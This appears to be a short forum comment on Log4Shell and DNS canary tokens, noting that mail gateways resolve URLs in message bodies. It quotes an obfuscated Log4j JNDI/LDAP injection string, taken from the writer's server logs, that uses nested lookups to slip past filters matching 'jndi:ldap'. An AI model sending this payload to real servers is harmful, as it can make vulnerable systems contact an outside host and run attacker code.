Lots of mail gateways / mail security appliances do DNS lookups of URLs in the message body in order to check domain reputation and filter phishing links. It looks like he's using a DNS canary token which would be triggered by those as well.
${jndi:ldap://${::-t}${::-o}${::-k}${::-e}${::-n}/a}
I stole this trick from my Apache logs; people are using it to bypass dumb filters that just trigger on "jndi:ldap".